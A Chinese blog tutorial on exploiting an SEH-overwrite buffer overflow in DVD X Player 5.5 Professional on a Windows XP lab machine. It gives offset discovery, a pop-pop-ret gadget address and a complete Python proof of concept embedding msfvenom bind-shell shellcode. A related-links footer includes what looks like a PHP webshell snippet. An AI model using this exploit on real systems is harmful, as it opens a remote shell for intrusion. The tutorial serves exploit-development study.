Windows exploit初探-通过修改seh get shell

最新推荐文章于 2022-10-23 20:03:08 发布
最新推荐文章于 2022-10-23 20:03:08 发布
阅读量1k 收藏
点赞数
分类专栏: windows-pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36495104/article/details/107076285
版权

原文地址:https://www.fuzzysecurity.com/tutorials/expDev/3.html
发现看雪有翻译的:https://bbs.pediy.com/user-686289-2.htm

有漏洞的软件

链接:https://pan.baidu.com/s/1XIVgoo7t2kCwbd1wZLJ7Zw
提取码:khmh

在xp虚拟机里安装上面下载的安装包,然后用下面的脚本创建一个文件,绕后用安装好的软件来打开这个文件,造成缓冲区溢出,覆盖seh链

filename="evil.plf"
 
buffer = "A"*2000
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

先运行软件,然后debugger attach 上去以后,点击运行。
在这里插入图片描述
按下图,打开我们上面用脚本创建好的文件
在这里插入图片描述
点击open playlist后,debugger会卡住,此时按shift+F9,继续运行,然后再切换到DVD X Player
在这里插入图片描述
可以发现已经成功覆盖了seh链
在这里插入图片描述

使用gdb的peda插件来判断偏移

gdb-peda$ pattern create  1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

将上面的字符串替换到那个文件里去。然后重复上面的步骤,再来看SEH链,handler被覆盖成了0x24424142
在这里插入图片描述
确定偏移
在这里插入图片描述

构造buffer如下,buffer = “A”*608 + [nSEH] + [SEH] + “D”*1384
其中nSEH填充为jump code即跳转到shellcode的指令,SEH填充为pop pop ret的指令(这是因为seh调用的时候会把寄存器置0,导致寄存器中存储的shellcode的地址被清空,无法使用jmp reg 去跳转到shellcode执行)

下面是corelan教程里的一张图
正常的seh

buffer = “A”*608 + “B”*4 + “C”*4 + “D”*1384

再次crash后,使用mona来查找pop pop ret gadgets
在这里插入图片描述
这里使用

  0x61617619 : pop esi # pop edi # ret  | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll)

再次构造buffer

filename="evil.plf"
buffer = "A"*608 + "B"*4 + "\x19\x76\x61\x61" + "D"*1384
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

打开程序,attach上去,给0x61617619地址下断点,然后用有漏洞的软件打开文件后,通过Shift-F9传递第一个异常后,到了断点
在这里插入图片描述
在这里插入图片描述
执行完ret之后,可以看到跳转到了0x12f5b8处执行命令,而这里是我们的栈空间,我们输入的字符’B’被当做了shellcode执行。
在这里插入图片描述
并且可以看到0x12F5C0为我们的’D’字符串,所以我们将’B’字符串替换成指令 jmp 0x12F5C0
在这里插入图片描述
在这里插入图片描述

所以最终的poc如下,shellcode用的上一章的,不过生成的时候,排除坏字节与上一章的不一样。

# root @ kali in ~ [9:04:36] 
$ msfvenom -p  windows/shell_bind_tcp  lport=4444 -f c -b '\x00\x0A\x0D\x1A' 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] = 
"\xdb\xd3\xb8\x1c\x01\x75\xbc\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x83\xc5\x04\x31\x45\x13\x03\x59\x12\x97\x49\x9d\xfc\xd5"
"\xb2\x5d\xfd\xb9\x3b\xb8\xcc\xf9\x58\xc9\x7f\xca\x2b\x9f\x73"
"\xa1\x7e\x0b\x07\xc7\x56\x3c\xa0\x62\x81\x73\x31\xde\xf1\x12"
"\xb1\x1d\x26\xf4\x88\xed\x3b\xf5\xcd\x10\xb1\xa7\x86\x5f\x64"
"\x57\xa2\x2a\xb5\xdc\xf8\xbb\xbd\x01\x48\xbd\xec\x94\xc2\xe4"
"\x2e\x17\x06\x9d\x66\x0f\x4b\x98\x31\xa4\xbf\x56\xc0\x6c\x8e"
"\x97\x6f\x51\x3e\x6a\x71\x96\xf9\x95\x04\xee\xf9\x28\x1f\x35"
"\x83\xf6\xaa\xad\x23\x7c\x0c\x09\xd5\x51\xcb\xda\xd9\x1e\x9f"
"\x84\xfd\xa1\x4c\xbf\xfa\x2a\x73\x6f\x8b\x69\x50\xab\xd7\x2a"
"\xf9\xea\xbd\x9d\x06\xec\x1d\x41\xa3\x67\xb3\x96\xde\x2a\xdc"
"\x5b\xd3\xd4\x1c\xf4\x64\xa7\x2e\x5b\xdf\x2f\x03\x14\xf9\xa8"
"\x64\x0f\xbd\x26\x9b\xb0\xbe\x6f\x58\xe4\xee\x07\x49\x85\x64"
"\xd7\x76\x50\x10\xdf\xd1\x0b\x07\x22\xa1\xfb\x87\x8c\x4a\x16"
"\x08\xf3\x6b\x19\xc2\x9c\x04\xe4\xed\xb3\x88\x61\x0b\xd9\x20"
"\x24\x83\x75\x83\x13\x1c\xe2\xfc\x71\x34\x84\xb5\x93\x83\xab"
"\x45\xb6\xa3\x3b\xce\xd5\x77\x5a\xd1\xf3\xdf\x0b\x46\x89\xb1"
"\x7e\xf6\x8e\x9b\xe8\x9b\x1d\x40\xe8\xd2\x3d\xdf\xbf\xb3\xf0"
"\x16\x55\x2e\xaa\x80\x4b\xb3\x2a\xea\xcf\x68\x8f\xf5\xce\xfd"
"\xab\xd1\xc0\x3b\x33\x5e\xb4\x93\x62\x08\x62\x52\xdd\xfa\xdc"
"\x0c\xb2\x54\x88\xc9\xf8\x66\xce\xd5\xd4\x10\x2e\x67\x81\x64"
"\x51\x48\x45\x61\x2a\xb4\xf5\x8e\xe1\x7c\x05\xc5\xab\xd5\x8e"
"\x80\x3e\x64\xd3\x32\x95\xab\xea\xb0\x1f\x54\x09\xa8\x6a\x51"
"\x55\x6e\x87\x2b\xc6\x1b\xa7\x98\xe7\x09";

POC如下

filename="evil.plf"
 
shellcode = (
"\xdb\xd3\xb8\x1c\x01\x75\xbc\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x83\xc5\x04\x31\x45\x13\x03\x59\x12\x97\x49\x9d\xfc\xd5"
"\xb2\x5d\xfd\xb9\x3b\xb8\xcc\xf9\x58\xc9\x7f\xca\x2b\x9f\x73"
"\xa1\x7e\x0b\x07\xc7\x56\x3c\xa0\x62\x81\x73\x31\xde\xf1\x12"
"\xb1\x1d\x26\xf4\x88\xed\x3b\xf5\xcd\x10\xb1\xa7\x86\x5f\x64"
"\x57\xa2\x2a\xb5\xdc\xf8\xbb\xbd\x01\x48\xbd\xec\x94\xc2\xe4"
"\x2e\x17\x06\x9d\x66\x0f\x4b\x98\x31\xa4\xbf\x56\xc0\x6c\x8e"
"\x97\x6f\x51\x3e\x6a\x71\x96\xf9\x95\x04\xee\xf9\x28\x1f\x35"
"\x83\xf6\xaa\xad\x23\x7c\x0c\x09\xd5\x51\xcb\xda\xd9\x1e\x9f"
"\x84\xfd\xa1\x4c\xbf\xfa\x2a\x73\x6f\x8b\x69\x50\xab\xd7\x2a"
"\xf9\xea\xbd\x9d\x06\xec\x1d\x41\xa3\x67\xb3\x96\xde\x2a\xdc"
"\x5b\xd3\xd4\x1c\xf4\x64\xa7\x2e\x5b\xdf\x2f\x03\x14\xf9\xa8"
"\x64\x0f\xbd\x26\x9b\xb0\xbe\x6f\x58\xe4\xee\x07\x49\x85\x64"
"\xd7\x76\x50\x10\xdf\xd1\x0b\x07\x22\xa1\xfb\x87\x8c\x4a\x16"
"\x08\xf3\x6b\x19\xc2\x9c\x04\xe4\xed\xb3\x88\x61\x0b\xd9\x20"
"\x24\x83\x75\x83\x13\x1c\xe2\xfc\x71\x34\x84\xb5\x93\x83\xab"
"\x45\xb6\xa3\x3b\xce\xd5\x77\x5a\xd1\xf3\xdf\x0b\x46\x89\xb1"
"\x7e\xf6\x8e\x9b\xe8\x9b\x1d\x40\xe8\xd2\x3d\xdf\xbf\xb3\xf0"
"\x16\x55\x2e\xaa\x80\x4b\xb3\x2a\xea\xcf\x68\x8f\xf5\xce\xfd"
"\xab\xd1\xc0\x3b\x33\x5e\xb4\x93\x62\x08\x62\x52\xdd\xfa\xdc"
"\x0c\xb2\x54\x88\xc9\xf8\x66\xce\xd5\xd4\x10\x2e\x67\x81\x64"
"\x51\x48\x45\x61\x2a\xb4\xf5\x8e\xe1\x7c\x05\xc5\xab\xd5\x8e"
"\x80\x3e\x64\xd3\x32\x95\xab\xea\xb0\x1f\x54\x09\xa8\x6a\x51"
"\x55\x6e\x87\x2b\xc6\x1b\xa7\x98\xe7\x09")

 
evil = "\x90"*20 + shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

熟悉的shell
在这里插入图片描述

0xCCCC9090
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ElasticSearch7.6入门学习笔记
lovely_ll的博客
04-11 2134
ElasticSearch7.6入门学习笔记 在学习ElasticSearch之前,先简单了解一下Lucene: Doug Cutting开发 是apache软件基金会4 jakarta项目组的一个子项目 是一个开放源代码的全文检索引擎工具包 不是一个完整的全文检索引擎,而是一个全文检索引擎的架构,提供了完整的查询引擎和索引引擎,部分文本分析引擎(英文与德文两种西方语言) 当前以及最近几年最受欢迎的免费Java信息检索程序库。 Lucene和ElasticSearch的关系: ElasticSearc
手动设置SEH
weixin_30896825的博客
03-09 284
转载至 http://bbs.pediy.com/showthread.php?t=46690 一般情况下我们在 VS2005以上都不能手动设置SEH异常处理函数 因为有 SafeSEH 保护 但是可以将保护的SEH验证给篡改掉 也就是将 系统的SEH函数JMP我们的异常函数地址 如下: #include "stdafx.h" #include <Windows.h...
http:/222.212.79/app/zscd.html,emscripten/src/shell.html at 1.29.12 · emscripten-core/emscripten · G...
weixin_36304957的博客
06-21 21万+
version="1.1"id="Layer_1"x="0px"y="0px"width="296px"height="78px"viewBox="420 120 100 170"enable-background="new 0 0 900 400"xml:space="preserve"inkscape:version="0.48.4 r9939"sodipodi:docname="emscri...
记不住的命令
weixin_44508748的博客
07-19 2414
Windows 1.运行窗口命令 #服务 services.msc #网络配置 ncpa.cpl #RDP登录 mstsc #注册表 gpedit #计算器 calc #系统配置 msconfig #日志 eventvwr.msc #控制面板 control #域 dcpromo #记事本 notepad #画图板 mspaint #本地用户和组 lusrmgr.msc #磁盘清理工具 cleanmgr #计算机管理 compmgmt.msc #共享文件夹管理 fsmgmt.msc #组策略 gped
Windows exploit初探-栈溢出
qq_36495104的博客
07-02 1130
学习链接:https://www.fuzzysecurity.com
Windows-Exploit-Suggester-2
03-30
通过各种途径方法获取目标操作系统的systeminfo生成系统信息文件 ,并将生成的systeminfo信息的文件放在windows-exploit-suggester.py 文件同一个目录下。执行python脚本文件,查看目标网站存在的未修复漏洞信息,...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
Windows-Exploit-Suggester-master
03-20
Windows-Exploit-Suggester-master
cve-2018-2628 exp getshell
05-21
【标题】"CVE-2018-2628 EXP Getshell" 是一个与网络安全相关的主题,涉及到了一个特定的漏洞利用(Exploit)和获取远程 shell 的技术。CVE(Common Vulnerabilities and Exposures)是用于识别安全漏洞的全球唯一...
ThinkPHP_getshell-v2.zip
11-11
而提供的“ThinkPHP_getshell-v2.exe”文件,很可能是用于检测这个特定漏洞的工具,它可能是一个扫描器或exploit,帮助安全专家或者开发者检测他们的系统是否受到此漏洞的影响。 在ThinkPHP 5版本中,可能存在如SQL...
从零开始学习软件漏洞挖掘系列教程第七篇:实战挖掘Mini-stream Ripper缓冲
04-22
软件漏洞挖掘系列教程第七篇:实战挖掘Mini-stream Ripper缓冲
关于七牛云视频开发api
吕建奎的专栏
04-15 1万+
作者:梁涛 链接:http://zhuanlan.zhihu.com/p/19659738 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 对于音频、视频等多媒体资源,七牛云也提供了丰富的处理指令,包含但不限于以下指令: 音视频元信息(avinfo)基本音视频处理(avthumb)视频截图(vframe)视频水印(vwatermark)音视频切片
监控学习系列(上):prometheus,grafana,promQL,AlertManager,Thanos背景
阿白,
04-16 6920
文章目录介绍kubernete上部署prometheus开始部署prometheus的webui普通应用与export的监控集群节点、集群自身监控与服务发现设置服务发现容器监控监控api-server监控podkube-state-metrics(deploy副本数,pod状态,pod重启次数)grafana介绍部署grafana部署监控集群的grafana插件PromQLpromQL查询Alertmanager介绍部署Alertmanager报警规则(prometheus中配置) 介绍 对于 Kubern
Prometheus+Granafa入门
weixin_40230682的博客
06-09 493
下载对应版本: 官网:https://prometheus.io/download/ github: https://github.com/prometheus/prometheus/releases
http://syy7.com/a/25.php,vue_element/vue_elementui.sql at 3ffdcb477ce3fbbc24cf1a4d7e3481a187023a02 ·...
热门推荐
weixin_34064233的博客
04-13 94万+
INSERT INTO `user_tb` VALUES ('1', '女', 'burtyang', 'C041580E1C6192B6084E03CE76D5C05C', '18', null, 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAwICQoJBwwKCQoNDAwOER0TERAQESMZGxUdKiUsKykl...
PHP运维管理
linking530的专栏
04-03 2万+
<?php $password = "osyunwei";//设置密码 error_reporting(E_ERROR); header("content-Type: text/html; charset=gb2312"); set_time_limit(0); function Root_GP(&$array) { while(list($key,$var) = each($array)
signature=82aa6bdc91a0d1261157e2997e6d4bda,alasql/yarn-error.log at develop · agershun/alasql · GitH...
weixin_42365586的博客
05-30 5万+
Arguments:/Users/mrw/.nvm/versions/node/v12.14.0/bin/node /Users/mrw/.yarn/bin/yarn.js add ChiqqPATH:/Users/mrw/.wasmer/bin:/Users/mrw/.wasmer/globals/wapm_packages/.bin:/Users/mrw/.google-cloud-sdk/b...
操持Linux下Oracle Tomcat 8080端口争持-2
weixin_30267785的博客
03-07 124
本源:网海拾贝 三、操持要领二 将xmlDB的端口转换为其它端口,此例转换为8082 SQL> call dbms_xdb.cfg_update(updateXML(dbms_xdb.cfg_get(), '/xdbconfig/sysconfig/protocolconfig/httpconfig/http-port/text ()', ...
红队常用命令速查
Hardworking666的博客
10-23 2万+
红队常用命令
windows-exploit-suggester.py
最新发布
05-26
windows-exploit-suggester.py 是一个 Python 脚本,用于在 Windows 操作系统上寻找可能被漏洞利用的软件程序。该脚本通过与 Microsoft 的安全更新目录进行对比,找出系统中未安装安全更新的软件版本,然后提供可能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值